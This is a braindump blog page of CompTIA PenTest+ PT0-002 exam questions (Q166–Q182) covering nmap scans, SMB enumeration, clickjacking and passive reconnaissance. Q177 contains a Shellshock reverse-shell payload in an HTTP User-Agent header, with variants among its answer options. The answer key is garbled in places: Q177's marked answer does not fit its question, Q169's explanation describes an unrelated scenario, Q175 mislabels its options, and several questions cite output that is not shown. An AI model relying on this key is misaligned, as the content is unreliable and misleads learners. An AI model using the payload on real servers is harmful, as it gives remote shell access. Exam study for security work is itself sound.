• Home
  • Blogs
  • Sep 25, 2025 Detailed New PT0-002 Exam Questions for Concept Clearance [Q166-Q182]

Sep 25, 2025 Detailed New PT0-002 Exam Questions for Concept Clearance [Q166-Q182]

Share

Sep 25, 2025 Detailed New PT0-002 Exam Questions for Concept Clearance

PT0-002 Exam Preparation Material with New PT0-002 Dumps Questions.


CompTIA PT0-002 certification exam covers various topics related to penetration testing, such as planning and scoping, information gathering and vulnerability identification, attacks, exploitation, and post-exploitation techniques, reporting, and communication skills. PT0-002 exam also tests the candidate's knowledge of legal and regulatory compliance requirements, standards, and ethical considerations. CompTIA PenTest+ Certification certification exam is vendor-neutral, which means it is not limited to a particular software or hardware vendor. A successful completion of the exam indicates that the candidate possesses the necessary skills and knowledge required to conduct a successful penetration test.


CompTIA PT0-002 Exam is an essential benchmark for any professional seeking to further their career in the field of cybersecurity. PT0-002 exam covers a broad range of topics including reconnaissance and foot-printing, scanning networks, enumeration, vulnerability discovery, exploitation, and post exploitation. PT0-002 examination is challenging, and candidates must pass with a score of 750 out of a possible 900 points to become certified.

 

NEW QUESTION # 166
Which of the following tools should a penetration tester use to crawl a website and build a wordlist using the data recovered to crack the password on the website?

  • A. DirBuster
  • B. Patator
  • C. CeWL
  • D. w3af

Answer: C

Explanation:
CeWL, the Custom Word List Generator, is a Ruby application that allows you to spider a website based on a URL and depth setting and then generate a wordlist from the files and web pages it finds. Running CeWL against a target organization's sites can help generate a custom word list, but you will typically want to add words manually based on your own OSINT gathering efforts.
https://esgeeks.com/como-utilizar-cewl/


NEW QUESTION # 167
A penetration tester is looking for a particular type of service and obtains the output below:
I Target is synchronized with 127.127.38.0 (reference clock)
I Alternative Target Interfaces:
I 10.17.4.20
I Private Servers (0)
I Public Servers (0)
I Private Peers (0)
I Public Peers (0)
I Private Clients (2)
I 10.20.8.69 169.254.138.63
I Public Clients (597)
I 4.79.17.248 68.70.72.194 74.247.37.194 99.190.119.152
I 12.10.160.20 68.80.36.133 75.1.39.42 108.7.58.118
I 68.56.205.98
I 2001:1400:0:0:0:0:0:1 2001:16d8:ddOO:38:0:0:0:2
I 2002:db5a:bccd:l:21d:e0ff:feb7:b96f 2002:b6ef:81c4:0:0:1145:59c5:3682 I Other Associations (1)
|_ 127.0.0.1 seen 1949869 times, last tx was unicast v2 mode 7
Which of the following commands was executed by the tester?

  • A. nmap-sU-pU:517-Pn-n-script=supermicro-ipmi-config<target>
  • B. nmap-sU-pU:37 -Pn -n -script=icap-info <target>
  • C. nmap-sU-pU:161-Pn-n-script=voldemort-info <target>
  • D. nmap-sU-pU:123-Pn-n-script=ntp-monlist <target>

Answer: D

Explanation:
The output provided indicates the use of the NTP protocol (Network Time Protocol) for querying a target system. The reference to "Public Clients" and the specific IP addresses listed, along with the mention of "Other Associations" and the use of NTP version 2, points towards the execution of an NTP monlist request. The monlist feature in NTP servers can be used to obtain a list of the last 600 hosts that have interacted with the NTP server. The command nmap -sU -pU:123 -Pn -n -script=ntp-monlist <target> specifically targets NTP servers on UDP port 123 to retrieve this information, making it the correct choice based on the output shown.


NEW QUESTION # 168
A penetration tester who is conducting a web-application test discovers a clickjacking vulnerability associated with a login page to financial data. Which of the following should the tester do with this information to make this a successful exploit?

  • A. Perform XSS.
  • B. Use BeEF.
  • C. Conduct a watering-hole attack.
  • D. Use browser autopwn.

Answer: C

Explanation:
A clickjacking vulnerability allows an attacker to trick a user into clicking on a hidden element on a web page, such as a login button or a link. A watering-hole attack is a technique where the attacker compromises a website that is frequently visited by the target users, and injects malicious code or content into the website.
The attacker can then use the clickjacking vulnerability to redirect the users to a malicious website or perform unauthorized actions on their behalf.
A: Perform XSS. This is incorrect. XSS (cross-site scripting) is a vulnerability where an attacker injects malicious scripts into a web page that are executed by the browser of the victim. XSS can be used to steal cookies, session tokens, or other sensitive information, but it is not directly related to clickjacking.
C: Use BeEF. This is incorrect. BeEF (Browser Exploitation Framework) is a tool that allows an attacker to exploit various browser vulnerabilities and take control of the browser of the victim. BeEF can be used to launch clickjacking attacks, but it is not the only way to do so.
D: Use browser autopwn. This is incorrect. Browser autopwn is a feature of Metasploit that automatically exploits browser vulnerabilities and delivers a payload to the victim's system. Browser autopwn can be used to compromise the browser of the victim, but it is not directly related to clickjacking.
References:
* 1: OWASP Foundation, "Clickjacking", https://owasp.org/www-community/attacks/Clickjacking
* 2: PortSwigger, "What is clickjacking? Tutorial & Examples", https://portswigger.net/web-security
/clickjacking
* 4: Akto, "Clickjacking: Understanding vulnerability, attacks and prevention", https://www.akto.io/blog
/clickjacking-understanding-vulnerability-attacks-and-prevention


NEW QUESTION # 169
After running the enum4linux.pl command, a penetration tester received the following output:

Which of the following commands should the penetration tester run NEXT?

  • A. smbclient //192.168.100.56/web -U '' -N
  • B. smbget //192.168.100.56/web -U ''
  • C. smbspool //192.160.100.56/print$
  • D. net rpc share -S 192.168.100.56 -U ''

Answer: A

Explanation:
Explanation
A vulnerability scan is a type of assessment that helps to identify vulnerabilities in a network or system. It scans systems for potential vulnerabilities, misconfigurations, and outdated software. Based on the output from a vulnerability scan, a penetration tester can identify vulnerabilities that may be exploited to gain access to a system. In this scenario, the output from the penetration testing tool shows that 100 hosts contained findings due to improper patch management. This indicates that the vulnerability scan detected vulnerabilities that could have been prevented through proper patch management. Therefore, the most likely test performed by the penetration tester is a vulnerability scan.


NEW QUESTION # 170
A penetration tester conducted a discovery scan that generated the following:

Which of the following commands generated the results above and will transform them into a list of active hosts for further analysis?

  • A. nmap --open 192.168.0.1-254, uniq
  • B. nmap -sn 192.168.0.1-254 , grep "Nmap scan" | awk '{print S5}'
  • C. nmap -oG list.txt 192.168.0.1-254 , sort
  • D. nmap -o 192.168.0.1-254, cut -f 2

Answer: B

Explanation:
the NMAP flag (-sn) which is for host discovery and returns that kind of NMAP output. And the AWK command selects column 5 ({print $5}) which obviously carries the returned IP of the host in the NMAP output.
This command will generate the results shown in the image and transform them into a list of active hosts for further analysis. The command consists of three parts:
* nmap -sn 192.168.0.1-254: This part uses nmap, a network scanning tool, to perform a ping scan (-sn) on the IP range 192.168.0.1-254, which means sending ICMP echo requests to each IP address and checking if they respond.
* grep "Nmap scan": This part uses grep, a text filtering tool, to search for the string "Nmap scan" in the output of the previous part and display only the matching lines. This will filter out the lines that show
* the start and end time of the scan and only show the lines that indicate the status of each host.
* awk '{print $5}': This part uses awk, a text processing tool, to print the fifth field ($5) of each line in the output of the previous part. This will extract only the IP addresses of each host and display them as a list.
The final output will look something like this:
192.168.0.1 192.168.0.12 192.168.0.17 192.168.0.34


NEW QUESTION # 171
A penetration tester utilized Nmap to scan host 64.13.134.52 and received the following results:

Based on the output, which of the following services are MOST likely to be exploited? (Choose two.)

  • A. SNMP
  • B. SMTP
  • C. HTTP
  • D. DNS
  • E. Telnet
  • F. NTP

Answer: C,D


NEW QUESTION # 172
During an assessment, a penetration tester found an application with the default credentials enabled. Which of the following best describes the technical control required to fix this issue?

  • A. System hardening
  • B. Patch management
  • C. Multifactor authentication
  • D. Password encryption

Answer: A

Explanation:
* System hardening involves securing a system by reducing its surface of vulnerability, which includes changing default credentials, disabling unnecessary services, and applying security patches.
* Details:
A . Password encryption: Secures passwords but does not address the issue of default credentials.
B . System hardening: Comprehensive approach to securing the system, including changing default credentials.
C . Multifactor authentication: Adds an additional layer of security but does not solve the problem of default credentials being enabled.
D . Patch management: Ensures software is up-to-date but does not directly address default credentials.
* Reference: System hardening is a fundamental practice in securing systems and preventing unauthorized access, as detailed in security best practices and guidelines.


NEW QUESTION # 173
The results of an Nmap scan are as follows:

Which of the following would be the BEST conclusion about this device?

  • A. This device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22 handle heartbeat extension packets, allowing attackers to obtain sensitive information from process memory.
  • B. This device is most likely a proxy server forwarding requests over TCP/443.
  • C. This device is most likely a gateway with in-band management services.
  • D. This device may be vulnerable to remote code execution because of a butter overflow vulnerability in the method used to extract DNS names from packets prior to DNSSEC validation.

Answer: C

Explanation:
The heart bleed bug is an open ssl bug which does not affect SSH Ref: https://www.sos-berlin.com/en/news- heartbleed-bug-does-not-affect-jobscheduler-or-ssh


NEW QUESTION # 174
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.
INSTRUCTIONS
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Answer:

Explanation:

Explanation:
1. Reflected XSS - Input sanitization (<> ...)
2. Sql Injection Stacked - Parameterized Queries
3. DOM XSS - Input Sanitization (<> ...)
4. Local File Inclusion - sandbox req
5. Command Injection - sandbox req
6. SQLi union - paramtrized queries
7. SQLi error - paramtrized queries
8. Remote File Inclusion - sandbox
9. Command Injection - input saniti $
10. URL redirect - prevent external calls


NEW QUESTION # 175
A penetration tester is conducting an Nmap scan and wants to scan for ports without establishing a connection. The tester also wants to find version data information for services running on Projects. Which of the following Nmap commands should the tester use?

  • A. ..nmap -sU -sV -T4 -F target.company.com
  • B. ..nmap -sX -sC target.company.com
  • C. ..nmap -sS -sV -F target.company.com
  • D. ..nmap -sT -v -T5 target.company.com

Answer: C

Explanation:
The Nmap command that the tester should use to scan for ports without establishing a connection and to find version data information for services running on open ports is nmap -sS -sV -F target.company.com. This command has the following options:
* -sS performs a TCP SYN scan, which is a scan technique that sends TCP packets with the SYN flag set to the target ports and analyzes the responses. A TCP SYN scan does not establish a full TCP connection, as it only completes the first step of the three-way handshake. A TCP SYN scan can stealthily scan for open ports without alerting the target system or application.
* -sV performs version detection, which is a feature that probes open ports to determine the service and version information of the applications running on them. Version detection can provide useful information for identifying vulnerabilities or exploits that affect specific versions of services or applications.
* -F performs a fast scan, which is a scan option that only scans the 100 most common ports according to the nmap-services file. A fast scan can speed up the scan process by avoiding scanning less likely or less interesting ports.
* target.company.com specifies the domain name of the target system or network to be scanned.
The other options are not valid Nmap commands that meet the requirements of the question. Option A performs a UDP scan (-sU), which is a scan technique that sends UDP packets to the target ports and analyzes the responses. A UDP scan can scan for open ports that use UDP protocol, such as DNS, SNMP, or DHCP.
However, a UDP scan does establish a connection with the target system or application, unlike a TCP SYN scan. Option C performs a TCP connect scan (-sT), which is a scan technique that sends TCP packets with the SYN flag set to the target ports and completes the three-way handshake with an ACK packet if a SYN/ACK packet is received. A TCP connect scan can scan for open ports that use TCP protocol, such as HTTP, FTP, or SSH. However, a TCP connect scan does establish a full TCP connection with the target system or application, unlike a TCP SYN scan. Option D performs an Xmas scan (-sX), which is a scan technique that sends TCP packets with the FIN, PSH, and URG flags set to the target ports and analyzes the responses. An Xmas scan can stealthily scan for open ports without alerting the target system or application, similar to a TCP SYN scan. However, option D does not perform version detection (-sV), which is one of the requirements of the question.


NEW QUESTION # 176
A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations. Which of the following are considered passive reconnaissance tools? (Choose two.)

  • A. Retina
  • B. Shodan
  • C. Nessus
  • D. Wireshark
  • E. Nikto
  • F. Burp Suite

Answer: B,D

Explanation:
Wireshark and Shodan are two tools that can be used to perform passive reconnaissance, which means collecting information from publicly available sources without interacting with the target or revealing one's identity. Wireshark is a tool that can be used to capture and analyze network traffic, such as packets, protocols, or sessions, without sending any data to the target. Shodan is a tool that can be used to search for devices or services on the internet, such as web servers, routers, cameras, or firewalls, without contacting them directly.
The other tools are not passive reconnaissance tools, but rather active reconnaissance tools, which means interacting with the target or sending data to it. Nessus and Retina are tools that can be used to perform vulnerability scanning, which involves sending probes or requests to the target and analyzing its responses for potential weaknesses. Burp Suite is a tool that can be used to perform web application testing, which involves intercepting and modifying web requests and responses between the browser and the server.


NEW QUESTION # 177
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:
exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept":
"text/html,application/xhtml+xml,application/xml"}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

  • A. exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept":
    "text/html,application/xhtml+xml,application/xml"}
  • B. exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept":
    "text/html,application/xhtml+xml,application/xml"}
  • C. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept":
    "text/html,application/xhtml+xml,application/xml"}
  • D. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1", "Accept":
    "text/html,application/xhtml+xml,application/xml"}

Answer: D


NEW QUESTION # 178
Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?

  • A. Remove the malware immediately.
  • B. Stop the assessment and inform the emergency contact.
  • C. Analyze the malware to see what it does.
  • D. Do a root-cause analysis to find out how the malware got in.
  • E. Collect the proper evidence and then remove the malware.

Answer: B


NEW QUESTION # 179
A security engineer is working to identify all email servers on a network. Which of the following commands should the engineer use to identify the servers as well as the software version the servers are running?

  • A. nmap 10.0.0.1/24 -sT -sV -p 25,110,143,465,993,995
  • B. nmap 10.0.0.1/24 -sS -sV -p 37,110,119,161,445,3389
  • C. nmap 10.0.0.1/24 -sT -v -p 21,22,23,53,110,135
  • D. nmap 10.0.0.1/24 -sA -sU -p 80,110,443,209,389,464

Answer: A


NEW QUESTION # 180
You are a penetration tester running port scans on a server.
INSTRUCTIONS
Part 1:Given the output, construct the command that was used to generate this output from the available options.
Part 2:Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Answer:

Explanation:
See explanation below.
Explanation:
Part 1 -192.168.2.2 -O -sV --top-ports=100 and SMB vulns
Part 2 - Weak SMB file permissions
https://subscription.packtpub.com/book/networking-and-servers/9781786467454/1/ch01lvl1sec13/fingerprinting


NEW QUESTION # 181
A penetration tester is preparing a credential stuffing attack against a company's website. Which of the following can be used to passively get the most relevant information?

  • A. Maltego
  • B. HavelBeenPwned
  • C. Shodan
  • D. BeEF

Answer: B

Explanation:
HaveIBeenPwned is a website that allows users to check if their personal data has been compromised by data breaches. For a penetration tester preparing a credential stuffing attack, HaveIBeenPwned can provide valuable information about which accounts and passwords have been exposed, making them more likely targets for successful credential stuffing. This passive information gathering tool can help in identifying the most relevant credentials without actively probing the target's systems. The other tools listed (Shodan, BeEF, Maltego) serve different purposes, such as device and service enumeration, client-side exploitation, and information gathering through different means, respectively.


NEW QUESTION # 182
......

PT0-002 2025 Training With 460 QA's: https://skillmeup.examprepaway.com/CompTIA/braindumps.PT0-002.ete.file.html

Related Blogs

more
CompTIA PT0-002 Certification Practice Exam